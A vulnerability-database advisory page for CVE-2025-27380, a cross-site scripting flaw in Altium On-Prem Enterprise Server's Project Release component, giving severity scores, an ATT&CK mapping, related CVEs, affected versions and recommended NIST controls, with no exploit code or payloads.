Cyber Resilience

CVE-2025-27380

High

Published: 22 January 2026

Published
22 January 2026
Modified
26 February 2026
KEV Added
Patch
CVSS Score v3.1 7.6 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
EPSS Score 0.0002 5.1th percentile
Risk Priority 15 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-27380 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Altium On-Prem Enterprise Server. Its CVSS base score is 7.6 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Browser Session Hijacking (T1185); ranked at the 5.1th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2025-27380 is an HTML injection vulnerability (CWE-79) in the Project Release component of Altium Enterprise Server (AES) version 7.0.3, affecting all supported platforms. Published on 2026-01-22, it has a CVSS v3.1 base score of 7.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N). The flaw enables an authenticated attacker to inject crafted HTML content, leading to the execution of arbitrary JavaScript in the victim's browser.

An authenticated user with low privileges (PR:L) can exploit this vulnerability over the network (AV:N) with low attack complexity (AC:L), though it requires user interaction (UI:R) from the victim. Successful exploitation changes the scope (S:C), resulting in high confidentiality impact (C:H) through cross-site scripting, allowing the attacker to steal sensitive data visible in the victim's browser session, such as session tokens or user information, while having limited integrity (I:L) and no availability (A:N) impact.

For mitigation details, refer to the Altium security advisory at https://www.altium.com/platform/security-compliance/security-advisories.

EU & UK References

Vulnerability details

HTML injection in Project Release in Altium Enterprise Server (AES) 7.0.3 on all platforms allows an authenticated attacker to execute arbitrary JavaScript in the victim’s browser via crafted HTML content.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1185 Browser Session Hijacking Collection
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Why these techniques?

XSS via HTML injection directly enables browser session hijacking to steal tokens/session data.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2026-1010Same product: Altium On-Prem Enterprise Server
CVE-2025-27378Same product: Altium On-Prem Enterprise Server
CVE-2026-1008Same vendor: Altium
CVE-2026-1009Same vendor: Altium
CVE-2025-25203Shared CWE-79
CVE-2025-67959Shared CWE-79
CVE-2025-68835Shared CWE-79
CVE-2026-32118Shared CWE-79
CVE-2025-24617Shared CWE-79
CVE-2026-30934Shared CWE-79

Affected Assets

altium
on-prem enterprise server
7.0.3 — 7.0.6

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly remediates the specific HTML injection flaw in Altium Enterprise Server 7.0.3 by identifying, reporting, and applying patches or updates.

prevent

Filters output HTML content prior to rendering in the victim's browser, preventing execution of arbitrary JavaScript from injected crafted content.

prevent

Validates incoming HTML content in the Project Release component against expected formats, blocking malicious inputs that could lead to JavaScript execution.

References